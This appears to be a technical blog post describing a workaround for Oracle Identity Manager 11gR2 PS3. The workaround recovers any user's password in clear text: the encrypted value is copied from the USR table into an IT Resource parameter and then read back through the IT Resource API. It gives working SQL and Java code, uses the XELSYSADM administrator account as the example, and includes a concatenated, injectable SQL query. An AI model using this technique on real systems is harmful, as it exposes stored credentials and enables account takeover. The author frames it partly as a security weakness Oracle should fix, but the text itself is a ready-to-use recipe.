Decrypt user's password in OIM 11gR2 PS3

In OIM 11gR2 PS1 we were able to get the user's password in clear text using below java code

tcDataProvider dbProvider = new tcDataBaseClient();

String query = "select USR_LOGIN,USR_PASSWORD from USR where USR_LOGIN=UPPER('"+uid+"')";
tcDataSet dataSet = new tcDataSet();
dataSet.setQuery(dbProvider, query);
dataSet.executeQuery();System.out.println("Password:: "+dataSet.getString("USR_PASSWORD"));

Starting from OIM 11gR2 PS2 this process no longer applicable, even if you run the above code in PS2 or PS3 version, this will give you ********* instead of clear text password.

I have found a way to get the user's password in clear text in OIM 11gR2 PS3 version. Execute the below procedure to get the same

1. take an ITResource in OIM and update password in password field.

     In my case I choose ITResource "Directory Server" and update "Admin Password" field.

    

2. From SQL Developer run the below query to get the database field of that ITResource

       select spd.SPD_FIELD_NAME, svp.SVP_FIELD_VALUE from spd, svp where
        spd.spd_key = svp.spd_key and
        spd.svd_key = (select svd_key from svr where svr_name = 'Directory Server') and
        svp.svr_key = (select svr_key from svr where svr_name = 'Directory Server')

        Output

       

3. Find out the password field that you updated from sysadmin console. You can see the password is encrypted.

4. Now run below query to get the encrypted password of OIM user

     select USR_PASSWORD from USR where USR_LOGIN='XELSYSADM';

     Output: 3412:ElLNJh2hLSqX+OdI9CxS8Q==

5. Now copy the password of XELSYSADM and update the "Admin Password" field in ITResource from database table.

6. Now run the below method to get the password of XELSYSADM in clear text

public void getITResourceParameter() throws Exception {

final String methodName = "::getITResourceParameter::";

Map phAttributeList = new HashMap();

phAttributeList.put("IT Resources.Name", "Directory Server");

HashMap paramMap = new HashMap();

tcITResourceInstanceOperationsIntf ITResourceAPI = (tcITResourceInstanceOperationsIntf)oimClient.getService(tcITResourceInstanceOperationsIntf.class);

tcResultSet itresSet = ITResourceAPI.findITResourceInstances(phAttributeList);

itresSet.goToRow(0);

String ITResourceKey = itresSet.getStringValue("IT Resources.Key");

System.out.println("ITResourceKey::"+ITResourceKey);

tcResultSet paramValuesRS = ITResourceAPI.getITResourceInstanceParameters(Long.parseLong(ITResourceKey));

for(int j=0;j<paramValuesRS.getTotalRowCount();j++){

paramValuesRS.goToRow(j);

paramMap.put(paramValuesRS.getStringValue("IT Resources Type Parameter.Name"), paramValuesRS.getStringValue("IT Resources Type Parameter Value.Value"));

}

String adminPassword = (String) paramMap.get("Admin Password");

System.out.println("adminPassword ::"+adminPassword);

}

You can use any user instead of XELSYSADM to get their OIM password in clear text.

Explanation    
1. Even if in OIM PS3 version, they block the dataset API to get the password in clear text from USR table, but ITResource API still capable of getting ITResource password in clear text from database.

2. OIM still use single encryption mechanism to encrypt all of its password.

Now if you can replace the encrypted password from USR table to SVP table of ITResource, then you can use the ITResource API to get the password.

** Oracle still need to work on this to enhance the security of user's password.